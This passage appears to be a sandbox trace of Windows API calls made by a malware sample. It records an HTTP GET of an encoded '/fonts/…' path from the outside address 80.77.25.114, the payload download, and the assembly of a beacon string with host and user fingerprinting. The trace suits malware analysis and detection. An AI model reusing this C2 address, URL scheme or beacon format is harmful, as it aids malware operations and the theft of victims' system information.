psz="mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj") returned 0 [0160.392] lstrlenA (lpString="/fonts/") returned 7 [0160.392] lstrlenA (lpString="mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj") returned 331 [0160.392] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x153) returned 0x2c59b28 [0160.392] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0160.392] lstrcatA (in: lpString1="/fonts/", lpString2="mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj" | out: lpString1="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj") returned="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj" [0160.393] lstrcpyA (in: lpString1=0x2c5fa40, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0160.393] lstrcpyA (in: lpString1=0x2c5f238, lpString2="80.77.25.114" | out: lpString1="80.77.25.114") returned="80.77.25.114" [0160.393] lstrcatA (in: lpString1="80.77.25.114", lpString2="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj" | out: lpString1="80.77.25.114/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj") returned="80.77.25.114/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj" [0160.393] lstrcatA (in: lpString1="80.77.25.114/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj", lpString2=".bak" | out: lpString1="80.77.25.114/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak") returned="80.77.25.114/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak" [0160.393] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0160.393] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0160.393] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x38c [0160.393] lstrlenA (lpString="80.77.25.114/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak") returned 354 [0160.393] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x163) returned 0x2c59c88 [0160.393] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x163) returned 0x2c5fba8 [0160.393] StrChrA (lpStart="80.77.25.114/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak", wMatch=0x2f) returned="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak" [0160.393] StrChrA (lpStart="80.77.25.114/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak", wMatch=0x3f) returned 0x0 [0160.393] memcpy (in: _Dst=0x2c59c88, _Src=0x2c5f238, _Size=0xc | out: _Dst=0x2c59c88) returned 0x2c59c88 [0160.393] lstrcpyA (in: lpString1=0x2c5fba8, lpString2="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak" | out: lpString1="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak") returned="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak" [0160.393] lstrlenA (lpString="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak") returned 342 [0160.393] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2ad) returned 0x2c5fd18 [0160.393] InternetCanonicalizeUrlA (lpszUrl="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak", lpszBuffer=0x2c5fd18, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0160.393] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak", lpszBuffer=0x2c5fd18, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak", lpdwBufferLength=0x11ff040) returned 1 [0160.395] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fba8 | out: hHeap=0x2860000) returned 1 [0160.395] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0160.395] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0160.396] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0160.396] ResetEvent (hEvent=0x3a0) returned 1 [0160.396] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.25.114", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0160.396] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.25.114", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0160.398] SetEvent (hEvent=0x3a0) returned 1 [0160.398] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/mHtZyjI0/Iw6fkq0I08toJRZty2tDaiJ/4jQnUzz6uR/_2FafMnyZ6W1khq_2/BQkGIs95Yx3t/lmqphNUXfCV/EuuOqWDRoZCpN3/qvtcpxyYR1hCCCXBmH1v6/6jC6TNQC9YBa8IpM/KH8VseiFufgFOR_/2FEYq9kVgSqho66d_2/F4ic45j9H/w5N7CxLjNXOEnaWyakOL/N7W3NcEQJ4Kwt0zDjCU/ZG8sa_2FTT7PsDpO0cGczi/K4nD3eZHnHw4T/5zzRwOIi/JDc8olgeEdux2SUumV3FIZU/Gyhb2_2BWC/mQseCoK0QJ2dktFxd/D2pcj.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0160.399] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0160.399] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0160.400] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0160.400] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0160.400] ResetEvent (hEvent=0x3a0) returned 1 [0160.400] ResetEvent (hEvent=0x38c) returned 1 [0160.400] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0160.400] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0160.400] GetLastError () returned 0x3e5 [0160.400] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x0) returned 0x102 [0160.400] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0160.400] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x3a0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0160.582] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x0) returned 0x0 [0160.582] SetEvent (hEvent=0x3a0) returned 1 [0160.583] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0160.583] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) returned 0 [0160.583] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xcc) returned 0x2c5fba8 [0160.583] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x2c5fba8, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x2c5fba8*, lpdwBufferLength=0x11ff054*=0xca, lpdwIndex=0x11ff04c*=0x0) returned 1 [0160.583] ResetEvent (hEvent=0x3a0) returned 1 [0160.583] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x11ff050, dwNumberOfBytesToRead=0x4, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x11ff050*, lpdwNumberOfBytesRead=0x11ff05c*=0x4) returned 1 [0160.583] CreateStreamOnHGlobal (hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058) [0160.583] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058 | out: ppstm=0x11ff058*=0x7ba440) returned 0x0 [0160.583] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2be00d8 [0160.584] ISequentialStream:RemoteWrite (in: This=0x7ba440, pv=0x11ff050*=0x3c, cb=0x4, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0160.584] ResetEvent (hEvent=0x3a0) returned 1 [0160.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be00d8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be00d8*, lpdwNumberOfBytesRead=0x11ff05c*=0x220) returned 1 [0160.584] ISequentialStream:RemoteWrite (in: This=0x7ba440, pv=0x2be00d8*=0x6c, cb=0x220, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0160.584] ResetEvent (hEvent=0x3a0) returned 1 [0160.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be00d8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be00d8*, lpdwNumberOfBytesRead=0x11ff05c*=0x0) returned 1 [0160.585] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0160.585] IStream:Stat (This=0x7ba440, pstatstg=0x11fefe0, grfStatFlag=0x1) [0160.585] IStream:Stat (in: This=0x7ba440, pstatstg=0x11fefe0, grfStatFlag=0x1 | out: pstatstg=0x11fefe0) returned 0x0 [0160.585] IStream:RemoteSeek (in: This=0x7ba440, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0160.585] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x225) returned 0x2be00d8 [0160.585] ISequentialStream:RemoteRead (in: This=0x7ba440, pv=0x2be00d8, cb=0x224, pcbRead=0x11ff03c | out: pv=0x2be00d8*=0x3c, pcbRead=0x11ff03c*=0x224) returned 0x0 [0160.585] IUnknown:Release (This=0x7ba440) returned 0x0 [0160.585] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x38c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0160.585] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0160.585] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0160.585] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0160.585] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0160.586] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0160.586] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0160.586] CloseHandle (hObject=0x3a0) returned 1 [0160.586] CloseHandle (hObject=0x38c) returned 1 [0160.586] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0160.587] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fba8 | out: hHeap=0x2860000) returned 1 [0160.587] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c88 | out: hHeap=0x2860000) returned 1 [0160.588] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd18 | out: hHeap=0x2860000) returned 1 [0160.588] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0160.589] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0160.589] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f238 | out: hHeap=0x2860000) returned 1 [0160.589] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0160.590] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0160.590] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0160.590] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0170.603] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0170.603] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0170.603] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0170.603] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0170.603] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0170.603] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2843593452241) returned 1 [0170.604] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=28435") returned 13 [0170.604] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0170.604] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0170.604] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0170.604] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0170.606] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0170.606] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0170.606] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0170.606] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0170.606] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0170.606] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0170.608] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0170.608] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0170.608] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0170.608] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0170.609] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 